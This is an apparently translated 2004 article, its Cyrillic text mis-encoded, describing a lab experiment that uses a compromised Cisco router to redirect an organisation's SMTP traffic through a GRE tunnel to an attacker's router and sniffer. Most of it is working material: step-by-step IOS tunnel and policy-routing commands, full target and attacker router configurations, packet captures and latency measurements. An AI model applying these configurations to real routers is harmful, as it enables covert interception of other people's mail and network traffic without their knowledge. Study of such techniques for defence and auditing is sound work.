10.03.2004

»спользование взломанного маршрутизатора дл€ захвата сетевого трафика.

¬ данной статье описываетс€ подход, методологи€ и результаты проведенного эксперимента по использованию взломанного маршрутизатора как средства дл€ захвата сетевого трафика. ћаршрутизаторы наход€тс€ вне корпоративной межсетевой защиты и часто очень плохо защищены. ¬ некоторых случа€х, взломанный маршрутизатор может использоватьс€ в качестве отправной точки дл€ дальнейшего захвата сети, но наиболее ценным подходом €вл€етс€ использование маршрутизатора дл€ сниффинга вход€щего и исход€щего сетевого трафика организации.

ƒавид “ейлор, перевод јлексей јнтипов

1. ¬ведение

¬ данной статье описываетс€ подход, методологи€ и результаты проведенного эксперимента по использованию взломанного маршрутизатора как средства дл€ захвата сетевого трафика. ћаршрутизаторы наход€тс€ вне корпоративной межсетевой защиты и часто очень плохо защищены. ¬ некоторых случа€х, взломанный маршрутизатор может использоватьс€ в качестве отправной точки дл€ дальнейшего захвата сети, но наиболее ценным подходом €вл€етс€ использование маршрутизатора дл€ сниффинга вход€щего и исход€щего сетевого трафика организации.

2. ѕодход

¬ыбранный подход заключалс€ в установлении GRE туннел€ между захваченным маршрутизатором и маршрутизатором, наход€щимс€ под управлением злоумышленника. ћаршрутизаци€ настраивалась таким образом, чтобы переадресовывать вход€щий и исход€щий трафик на маршрутизатор злоумышленника через GRE туннель. ѕри этом трафик прежде обрабатывалс€ маршрутизатором злоумышленника, а после возвращалс€ на основной маршрутизатор дл€ заключительной доставки (снова через GRE туннель).

Ѕыло проверено два вида сценариев обработки трафика. ¬ первом, захваченный трафик был просто "отражен" маршрутизатором злоумышленника мину€ GRE туннель, как показано на рис. 1. Ётот метод имел преимущество в простоте конфигурировани€ маршрутизатора, но имел некоторые недостатки:

- ƒл€ захвата трафика необходимо "проснифить" внешний интерфейс маршрутизатора злоумышленника. Ёто достаточно трудно реализовать в сет€х отличных от Ethernet.

- «ахваченный сетевой трафик €вл€етс€ GRE инкапсулированным. Ќеобходимо было декапсулировать этот трафик прежде, чем произойдет декодирование IP адресов.

–исунок 1. —ценарий 1.

¬о втором сценарии, маршрутизатор злоумышленника конфигурируетс€ дл€ передачи захваченного трафика на рабочую станцию Unix, перед пересылкой на целевой маршрутизатор. Ёто показано на рисунке 2. ¬ таком сценарии устранены предыдущие недостатки.

- внешние сетевые носители на маршрутизаторе злоумышленника - произвольны

- трафик, переправленный через рабочую станцию Unix уже декапсулирован, что дает меньше времени дл€ извлечени€ нужной информации.

–исунок 2. —ценарий 2.

ћетодологи€

Ќа представленном ниже рисунке показана топологи€ сети, используемой в нашем эксперименте.

–исунок 3. “опологи€ сети.

ќборудование

Ќа целевом маршрутизаторе используетс€ оборудование Dual Ethernet Cisco 3600. ћаршрутизатор злоумышленника - Ethernet Cisco 2600. “ака€ топологи€ одинаково применима к любому Cisco IOS маршрутизатору. Ёто также применимо к любым маршрутизаторам, использующим GRE и политику маршрутизации.

ѕочтовый сервер €вл€етс€ Linux станцией. —етевой сниффер - рабочей станцией Solaris. ¬ыбор данного оборудовани€ был полностью произволен.

”становление GRE туннел€

ѕервым шагом, после IP конфигурировани€ маршрутизатора, €вл€етс€ установление GRE туннел€ между целевым маршрутизатором и маршрутизатором злоумышленника. ѕри реальном выполнении данной методики, дл€ начала целевой маршрутизатор должен быть взломан, чтобы быть сконфигурированным удаленно. Ќо описание методов дискредитации устройств выход€т за рамки данной статьи.

Ќа целевом маршрутизаторе:

Target#conf t
Target(config)#int tunnel0
Target(config-if)#ip address 192.168.5.1 255.255.255.0
Target(config-if)#tunnel source eth0/1
Target(config-if)#tunnel dest 192.168.1.2
Target(config-if)#tunnel mode gre ip
Target(config-if)#exit
Target(config)#exit
Target#

»так, мы создали туннельный интерфейс (называемый tunnel0). ≈му задан локальный (виртуальный) IP адрес 192.168.5.1. ¬нешний Ethernet интерфейс определен как локальна€ конечна€ точка туннел€, а маршрутизатор злоумышленника определен как удаленна€ конечна€ точка туннел€.

Ёквивалентные команды введены на маршрутизаторе злоумышленника.

Ќа маршрутизаторе злоумышленника:

Attacker#conf t
Attacker(config)#int tunnel0
Attacker(config-if)#ip address 192.168.5.2 255.255.255.0
Attacker(config-if)#tunnel source eth0/1
Attacker(config-if)#tunnel dest 192.168.1.1
Attacker(config-if)#tunnel mode gre ip
Attacker(config-if)#exit
Attacker(config)#exit
Attacker#

ѕосле всех вышеописанных операций мы установили GRE туннель между двум€ маршрутизаторами. Ќезависимо от того, сколько существует "прыжков" между маршрутизаторами по »нтернет, GRE туннель будет рассматриватьс€ как один единственный "прыжок".

—ценарий 1. ѕолитика маршрутизации.

ƒл€ сценари€ 1 (см. рис. 1), мы устанавливаем политику маршрутизации на интерфейсе tunnel0 маршрутизатора злоумышленника таким образом, "отражать" трафик, прибывающий в GRE туннель.

Ќа маршрутизаторе злоумышленника:

Attacker#conf t
Attacker(config)#access-list 100 permit ip any any
Attacker(config)#route-map reflect
Attacker(config-route-map)#match ip address 100
Attacker(config-route-map)#set ip next-hop 192.168.5.1
Attacker(config-route-map)#exit
Attacker(config)#int tunnel0
Attacker(config-if)#ip policy route-map reflect
Attacker(config-if)#exit
Attacker(config)#exit
Attacker#

—писок доступа 100 соответствует всему IP трафику.  арта маршрута выбирает весь трафик, соответствующий списку доступа 100(весь трафик) и отсылает его на IP адрес 192.168.5.1, €вл€ющийс€ конечной точкой GRE туннел€ целевого маршрутизатора. Ёта карта маршрута применена к интерфейсу tunnel0.

—ценарий 1. Ќастройка рабочей станции Unix

¬ сценарии 1, рабоча€ станци€ Unix хакера была помещена вне внешнего интерфейса его маршрутизатора. ¬ данном случае конфигураци€ рабочей станции Unix произвольна, поскольку она должна только пассивно захватывать сетевой трафик.

—ценарий 2. ѕолитика маршрутизации

¬о втором сценарии, мы настраиваем политику маршрутизации на туннельном интерфейсе маршрутизатора злоумышленника и на внутреннем Ethernet интерфейсе, чтобы "отражать" трафик, прибывающего из GRE туннел€ через рабочую станцию Unix, на внутренний Ethernet интерфейс.

Ќа маршрутизаторе злоумышленника:

  Attacker#conf t
Attacker(config)#access-list 100 permit ip any any
Attacker(config)#route-map send-traffic-in
Attacker(config-route-map)#match ip address 100
Attacker(config-route-map)#set ip next-hop 192.168.3.2
Attacker(config-route-map)#exit
Attacker(config)#int tunnel0
Attacker(config-if)#ip policy route-map send-traffic-in
Attacker(config-if)#exit
Attacker(config)#route-map send-traffic-out
Attacker(config-route-map)#match ip address 100
Attacker(config-route-map)#set ip next-hop 192.168.5.1
Attacker(config-route-map)#exit
Attacker(config)#int eth0/0
Attacker(config-if)#ip policy route-map send-traffic-out
Attacker(config-if)#exit
Attacker(config)#exit
Attacker#
  

 арта маршрута пересылки вход€щего трафика установлена на интерфейсе tunnel0. C помощью этого происходит пересылка всего трафика, прибывающего через туннель, на первичный Ethernet адрес рабочей станции Unix (192.168.3.2). –абоча€ станци€ отсылает этот трафик назад на маршрутизатор злоумышленника (192.168.4.1), использу€ стандартный маршрут.

 арта маршрута пересылки исход€щего трафика установлена на внутреннем Ethernet интерфейсе маршрутизатора злоумышленника. C помощью этого происходит пересылка всего трафика из рабочей станции Unix на целевой маршрутизатор, мину€ GRE туннель.

—ценарий 2. Ќастройка рабочей станции Unix.

¬о втором сценарии, рабоча€ станци€ настроена следующим образом:

ѕервичный IP адрес: 192.168.3.2

¬торичный IP адрес: 192.168.4.2

ƒанный вторичный IP адрес €вл€етс€ виртуальным на всех физических сетевых интерфейсах.

—тандартный маршрут: 192.168.4.1

ќпределение трафика дл€ захвата

“еперь, необходимо определить списки доступа дл€ трафика, который необходимо захватить на целевом маршрутизаторе.

Ќа целевом маршрутизаторе:

Target#conf t
Target(config)#access-list 101 permit tcp any any eq 25
Target(config)#access-list 101 permit tcp any eq 25 any
Target(config)#exit
Target#

ƒанный список доступа соответствует всему SMTP (25/tcp) трафику. “еперь необходимо определить правила дл€ согласовани€ вход€щих и исход€щих пакетов, поскольку этот список доступа будет использоватьс€ в картах маршрута дл€ обоих интерфейсов целевого маршрутизатора.

ѕолитика маршрутизации на целевом маршрутизаторе.

Ќаконец, мы должны установить политику маршрутизации на целевом маршрутизаторе, дл€ пересылки интересующего нас трафика через GRE туннель.

Ќа целевом маршрутизаторе:

  Target#conf t
Target(config)#route-map capture-traffic
Target(config-route-map)#match ip address 101
Target(config-route-map)#set ip next-hop 192.168.5.2
Target(config-route-map)#exit
Target(config)#int eth0
Target(config-if)#ip policy route-map capture-traffic
Target(config-if)#exit
Target(config)#int eth1
Target(config-if)#ip policy route-map capture-traffic
Target(config-if)#exit
Target(config)#exit
Target#
  

 арта маршрута определена так, что трафик соответствует списку доступа 101 (весь SMTP трафик) и пересылаетс€ целевой маршрутизатор через GRE туннель. Ёта карта применена к внутреннему и внешнему интерфейсам маршрутизатора.

Ќа этот момент весь вход€щий и исход€щий трафики, проход€щие через маршрутизатор, будут переадресованы на маршрутизатор злоумышленника через GRE туннель. “рафик, прибывающий из захваченного маршрутизатора через GRE туннель (отраженный трафик) доставл€етс€ согласно стандартного маршрута.

ќкончательные конфигурации целевого маршрутизатора могут быть найдены в ѕриложении ј. ј конфигурации маршрутизатора злоумышленника дл€ сценариев 1 и 2 наход€тс€ в ѕриложении ¬ и — соответственно.

–езультаты

¬ обоих сценари€х SMTP соединени€ были перенаправлены через GRE туннель и успешно захвачены рабочей станцией Unix.

—ценарий 1.

Ќиже показан перехват создани€ сеанса SMTP соединени€ дл€ первого сценари€:

    1   0.00000  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
  2   0.00208  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=72, ID=823
  3   0.00144  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=72, ID=797
  4   0.00277  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=72, ID=824
  5   0.00140  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=72, ID=798
  6   0.00060  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
  7   0.00032  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
  8   0.00183  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=825
  9   0.00138  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=799
  

ѕакет 1: показываетс€ TCP SYN пакет от клиента к почтовому серверу.

ѕакеты 2 и 3: показываютс€ SYN пакет, посылаемый от целевого маршрутизатора к маршрутизатору злоумышленника и обратно.

ѕосле пакета 3: SYN пакет пересылаетс€ почтовому серверу (не показано). ѕочтовый сервер генерирует ответ с SYN/ACK пакетом (не показано)

ѕакеты 4 и 5: показываетс€ SYN/ACK пакет пересекающий GRE туннель.

ѕакет 6: показываетс€ SYN/ACK пакет, возвращаемый почтовому клиенту.

ѕакет 7: показываетс€ ACK пакет (финальный пакет при установлении св€зи) отсылаемый клиентом на почтовый сервер.

ѕакеты 8 и 9: показываетс€ этот ACK пакет, пересекающий GRE туннель.

ѕосле пакета 9: ACK пакет доставл€етс€ на почтовый сервер и устанавливаетс€ сеанс св€зи.

Ѕолее полна€ расшифровка этого захвата, вместе с протоколом дл€ пакета 2 находитс€ в ѕриложении D.

—ценарий 2.

Ќиже показан перехват создани€ сеанса SMTP соединени€ дл€ второго сценари€:

  1   0.00000  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  2   0.00014  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  3   0.00585  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
  4   0.00011  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
  5   0.00579  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  6   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712

ѕакет 1 и 2: показываетс€ TCP SYN пакет, посылаемый клиентом на почтовый сервер.

ѕакеты 3 и 4: показан SYN/ACK пакет, посылаемый почтовым сервером клиенту.

ѕакеты 5 и 6: показан ACK пакет от клиента к почтовому серверу.

Ѕолее полна€ расшифровка этого захватами находитс€ в ѕриложении D.

¬ыводы и обсуждение

"ѕрозрачность"

Ётот метод перехвата практически полностью не заметен конечному пользователю системы. —тандартные утилиты трассировки маршрутов не будут показывать дополнительные "скачки", созданные GRE переадресацией.

’от€, конечно, экспертиза конфигурации целевого маршрутизатора легко бы это раскрыла.

¬ремени задержки

ѕроцесс переадресации трафика через маршрутизатор злоумышленника увеличивает врем€ ожидании на захваченном трафике. ”величение времени ожидани€ можно задать формулой:

2n + м.

√де n - врем€, требуемое дл€ движени€ трафика через »нтернет от целевого маршрутизатора к маршрутизатору злоумышленника, а m - задержка, возникающа€ при обработке этого трафика маршрутизатором злоумышленника (и рабочей станцией Unix).

«начение m находитс€ в пределах 10ms (при лабораторных услови€х). —м. ѕриложение F.

«начение n, веро€тно, будет большим.

ƒальнейшее декодирование трафика

»звлечение полезной информации из захваченного трафика мы оставим как упражнение дл€ читателей. ƒл€ этого могут быть полезны различные Unix процедуры типа strings или od.

ѕриложение ј.  онфигураци€ целевого маршрутизатора.

!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Target
!
no logging console
!
ip subnet-zero
!
interface Tunnel0
 ip address 192.168.5.1 255.255.255.0
 tunnel source Ethernet0/1
 tunnel destination 192.168.1.2
!
interface Ethernet0/0
 ip address 192.168.2.1 255.255.255.0
 ip policy route-map capture-traffic
 half-duplex
!
interface Ethernet0/1
 ip address 192.168.1.1 255.255.255.0
 ip policy route-map capture-traffic
 half-duplex
!
ip classless
no ip http server
no ip pim bidir-enable
!
access-list 101 permit tcp any any eq smtp
access-list 101 permit tcp any eq smtp any
no cdp run
route-map capture-traffic permit 10
 match ip address 101
 set ip next-hop 192.168.5.2
!
line con 0
line aux 0
line vty 0 4
 privilege level 15
 login
!
end

ѕриложение B.  онфигураци€ маршрутизатора злоумышленника. —ценарий 1.

!
version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Attacker
!
logging buffered 4096 debugging
no logging console
enable secret 5 $1$cjVg$HSwnoTugnkpJb2ZrZTqsQ0
!
memory-size iomem 10
ip subnet-zero
!
interface Tunnel0
 ip address 192.168.5.2 255.255.255.0
 ip policy route-map reflect
 tunnel source Ethernet0/1
 tunnel destination 192.168.1.1
!
interface Ethernet0/0
 ip address 192.168.3.1 255.255.255.0
 half-duplex
!
interface Ethernet0/1
 ip address 192.168.1.2 255.255.255.0
 half-duplex
!
ip classless
no ip http server
no ip pim bidir-enable
!
access-list 100 permit ip any any
no cdp run
route-map reflect permit 10
 match ip address 100
 set ip next-hop 192.168.5.1
!
line con 0
line aux 0
line vty 0 4
 privilege level 15
 no login
!
end

ѕриложение —.  онфигураци€ маршрутизатора злоумышленника. —ценарий 2.

version 12.2
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Attacker
!
logging buffered 4096 debugging
no logging console
enable secret 5 $1$cjVg$HSwnoTugnkpJb2ZrZTqsQ0
!
memory-size iomem 10
ip subnet-zero
!
interface Tunnel0
 ip address 192.168.5.2 255.255.255.0
 ip policy route-map send-traffic-in
 tunnel source Ethernet0/1
 tunnel destination 192.168.1.1
!
interface Ethernet0/0
 ip address 192.168.4.1 255.255.255.0 secondary
 ip address 192.168.3.1 255.255.255.0
 ip policy route-map send-traffic-out
 half-duplex
!
interface Ethernet0/1
 ip address 192.168.1.2 255.255.255.0
 half-duplex
!
ip classless
no ip http server
no ip pim bidir-enable
!
access-list 100 permit ip any any
no cdp run
route-map send-traffic-out permit 10
 match ip address 100
 set ip next-hop 192.168.5.1
!
route-map send-traffic-in permit 10
 match ip address 100
 set ip next-hop 192.168.3.2
!
line con 0
line aux 0
line vty 0 4
 privilege level 15
 no login
!
end

ѕриложение D. «ахват трафика. —ценарий 1.

  1   0.00000  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
  2   0.00208  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=72, ID=823
  3   0.00144  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=72, ID=797
  4   0.00277  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=72, ID=824
  5   0.00140  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=72, ID=798
  6   0.00060  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
  7   0.00032  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
  8   0.00183  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=825
  9   0.00138  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=799
 10  40.09693  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=153, ID=826
 11   0.00142  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=153, ID=800
 12   0.00063  192.168.2.2 -> 192.168.1.3  SMTP R port=1617 220 localhost.locald
 13   0.13864  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
 14   0.00185  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=827
 15   0.00135  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=801
 
 82   2.18601  192.168.1.3 -> 192.168.2.2  SMTP C port=1617 q
 83   0.00211  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=65, ID=850
 84   0.00135  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=65, ID=824
 85   0.03858  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=851
 86   0.00131  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=825
 87   0.00051  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
 88   0.18110  192.168.1.3 -> 192.168.2.2  SMTP C port=1617 u
 89   0.00186  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=65, ID=852
 90   0.00136  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=65, ID=826
 91   0.00271  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=853
 92   0.00130  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=827
 93   0.00059  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
 94   0.05429  192.168.1.3 -> 192.168.2.2  SMTP C port=1617 i
 95   0.00191  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=65, ID=854
 96   0.00135  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=65, ID=828
 97   0.00269  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=855
 98   0.00131  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=829
 99   0.00051  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
100   0.16402  192.168.1.3 -> 192.168.2.2  SMTP C port=1617 t
101   0.00207  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=65, ID=856
102   0.00139  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=65, ID=830
103   0.00270  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=857
104   0.00133  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=831
105   0.00052  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
106   0.22869  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
107   0.00197  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=66, ID=858
108   0.00137  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=66, ID=832
109   0.00304  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=859
110   0.00130  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=833
111   0.00012  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=116, ID=860
112   0.00055  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
113   0.00093  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=116, ID=834
114   0.00058  192.168.2.2 -> 192.168.1.3  SMTP R port=1617 221 2.0.0 localhost.
115   0.00067  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=861
116   0.00133  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=835
117   0.00049  192.168.2.2 -> 192.168.1.3  SMTP R port=1617
118   0.00025  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
119   0.00044  192.168.1.3 -> 192.168.2.2  SMTP C port=1617
120   0.00172  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=862
121   0.00133  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=836
122   0.00007  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=863
123   0.00135  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=837
124   0.00255  192.168.1.1 -> 192.168.1.2  IP  D=192.168.1.2 S=192.168.1.1 LEN=64, ID=864
125   0.00130  192.168.1.2 -> 192.168.1.1  IP  D=192.168.1.1 S=192.168.1.2 LEN=64, ID=838
126   0.00054  192.168.2.2 -> 192.168.1.3  SMTP R port=1617

Ќиже показано декодирование GRE пакетов.

ETHER:
IP:   ----- IP Header -----
IP:
IP:   Version = 4
IP:   Header length = 20 bytes
IP:   Type of service = 0x00
IP:         xxx. .... = 0 (precedence)
IP:         ...0 .... = normal delay
IP:         .... 0... = normal throughput
IP:         .... .0.. = normal reliability
IP:   Total length = 72 bytes
IP:   Identification = 823
IP:   Flags = 0x0
IP:         .0.. .... = may fragment
IP:         ..0. .... = last fragment
IP:   Fragment offset = 0 bytes
IP:   Time to live = 255 seconds/hops
IP:   Protocol = 47 ()
IP:   Header checksum = 34fc
IP:   Source address = 192.168.1.1, 192.168.1.1
IP:   Destination address = 192.168.1.2, 192.168.1.2
IP:   No options
IP:

Ўестнадцатеричное декодирование тех же пакетов:

0000000 736e 6f6f 7000 0000 0000 0002 0000 0004
0000020 0000 0056 0000 0056 0000 0070 0000 0000
0000040 3d2d 0bcd 0001 110b 00d0 bafe 30e1 00e0
0000060 1e7e a0c2 0800 4500 0048 0337 0000 ff2f
0000100 34fc c0a8 0101 c0a8 0102 0000 0800 4500
0000120 0030 3380 4000 7f06 43f2 c0a8 0103 c0a8
0000140 0202 0651 0019 99d0 26a4 0000 0000 7002
0000160 4000 f86a 0000 0204 0534 0101 0402 0000

ѕриложение E. «ахват трафика. —ценарий 2.

  1   0.00000  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  2   0.00014  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  3   0.00585  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
  4   0.00011  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
  5   0.00579  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  6   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
  7  40.09285  192.168.2.2 -> 192.168.1.3  SMTP R port=1712 220 localhost.locald
  8   0.00016  192.168.2.2 -> 192.168.1.3  SMTP R port=1712 220 localhost.locald
  9   0.16606  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 10   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712

 59   1.62586  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 q
 60   0.00012  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 q
 61   0.04199  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 62   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 63   0.14919  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 u
 64   0.00012  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 u
 65   0.00574  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 66   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 67   0.08556  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 i
 68   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 i
 69   0.00570  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 70   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 71   0.12386  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 t
 72   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712 t
 73   0.00577  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 74   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 75   0.80846  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 76   0.00011  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 77   0.00613  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 78   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 79   0.00216  192.168.2.2 -> 192.168.1.3  SMTP R port=1712 221 2.0.0 localhost.
 80   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712 221 2.0.0 localhost.
 81   0.00220  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 82   0.00009  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 83   0.00670  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 84   0.00008  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 85   0.00169  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 86   0.00009  192.168.1.3 -> 192.168.2.2  SMTP C port=1712
 87   0.00645  192.168.2.2 -> 192.168.1.3  SMTP R port=1712
 88   0.00008  192.168.2.2 -> 192.168.1.3  SMTP R port=1712

ѕриложение F. ќценка увеличени€ времени ожидани€.

Ѕез переадресации\захвата:

C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=10ms TTL=254
Reply from 192.168.2.2: bytes=32 time<10ms TTL=254
Reply from 192.168.2.2: bytes=32 time<10ms TTL=254
Reply from 192.168.2.2: bytes=32 time<10ms TTL=254

Ping statistics for 192.168.2.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  10ms, Average =  2ms

C:\>ping -l 1000 192.168.2.2

Pinging 192.168.2.2 with 1000 bytes of data:

Reply from 192.168.2.2: bytes=1000 time<10ms TTL=254
Reply from 192.168.2.2: bytes=1000 time<10ms TTL=254
Reply from 192.168.2.2: bytes=1000 time<10ms TTL=254
Reply from 192.168.2.2: bytes=1000 time<10ms TTL=254

Ping statistics for 192.168.2.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

C:\>

— переадресацией \ захватом:

C:\>ping 192.168.2.2

Pinging 192.168.2.2 with 32 bytes of data:

Reply from 192.168.2.2: bytes=32 time=10ms TTL=250
Reply from 192.168.2.2: bytes=32 time=10ms TTL=250
Reply from 192.168.2.2: bytes=32 time=10ms TTL=250
Reply from 192.168.2.2: bytes=32 time=10ms TTL=250

Ping statistics for 192.168.2.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 10ms, Maximum =  10ms, Average =  10ms

C:\>ping -l 1000 192.168.2.2

Pinging 192.168.2.2 with 1000 bytes of data:

Reply from 192.168.2.2: bytes=1000 time=31ms TTL=250
Reply from 192.168.2.2: bytes=1000 time=20ms TTL=250
Reply from 192.168.2.2: bytes=1000 time=20ms TTL=250
Reply from 192.168.2.2: bytes=1000 time=20ms TTL=250

Ping statistics for 192.168.2.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 20ms, Maximum =  31ms, Average =  22ms

C:\>
или введите им€

CAPTCHA